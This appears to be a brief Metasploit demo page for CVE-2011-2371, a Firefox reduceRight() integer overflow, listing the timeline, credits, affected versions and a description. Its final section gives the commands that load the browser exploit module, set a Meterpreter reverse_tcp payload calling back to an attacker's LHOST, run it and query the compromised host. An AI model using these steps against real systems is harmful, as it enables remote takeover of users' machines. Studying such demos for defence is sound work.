CVE-2011-2371 Mozilla Firefox Array.reduceRight() Integer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Chris Rohlf & Yan Ivnitskiy the 2011-06-13
Public release of the vulnerability the 2011-06-21
Metasploit PoC provided the 2011-10-12

PoC provided by :

Chris Rohlf
Yan Ivnitskiy
Matteo Memelli
dookie2000ca
sinn3r

Reference(s) :

CVE-2011-2371
EDB-ID-17974
MFSA-2011-22

Affected version(s) :

Mozilla Firefox versions before 3.6.18
Mozilla Firefox versions before 4.0.1
Thunderbird versions before 3.1.11
SeaMonkey versions before 2.2

Tested on Windows XP SP3 with :

Mozilla Firefox 3.6.16

Description :

This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index being used, allowing abitrary remote code execution. Please note that the exploit requires a longer amount of time (compare to a typical browser exploit) in order to gain control of the machine.

Commands :

use exploit/windows/browser/mozilla_reduceright
set LHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo